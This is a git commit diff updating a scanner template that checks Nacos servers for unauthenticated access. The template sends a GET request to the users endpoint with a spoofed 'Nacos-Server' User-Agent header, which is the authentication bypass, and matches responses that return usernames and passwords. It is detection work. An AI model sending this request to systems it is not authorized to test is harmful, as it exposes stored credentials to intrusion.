Merge pull request #955 from pikpikcu/patch-87

Update unauthenticated-nacos-access.yaml
2021-02-26 11:15:39 +05:30 · 2021-02-26 11:15:39 +05:30 · c916f5f306
parent 6260ad1a83 892c25e4d0
commit c916f5f306
1 changed files with 17 additions and 13 deletions
--- a/misconfiguration/unauthenticated-nacos-access.yaml
+++ b/misconfiguration/unauthenticated-nacos-access.yaml
@ -1,30 +1,34 @@
 id: unauthenticated-nacos-access

 info:
-  name: Unauthenticated Nacos access
-  author: taielab
+  name: Unauthenticated Nacos access v1.x
+  author: taielab & @pikpikcu
  severity: critical
-
-  # References:
-  # - https://github.com/alibaba/nacos/issues/4593
+  issues: https://github.com/alibaba/nacos/issues/4593

 requests:
-  - raw:
-      - |
-        GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
+      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
+    headers:
      User-Agent: Nacos-Server
-        Content-Length: 2

    matchers-condition: and
    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: application/json"
+        part: header
+
      - type: regex
        regex:
          - '"username":'
          - '"password":'
-          - '"totalCount":'
-        condition: and
        part: body
+        condition: and
+
      - type: status
        status:
          - 200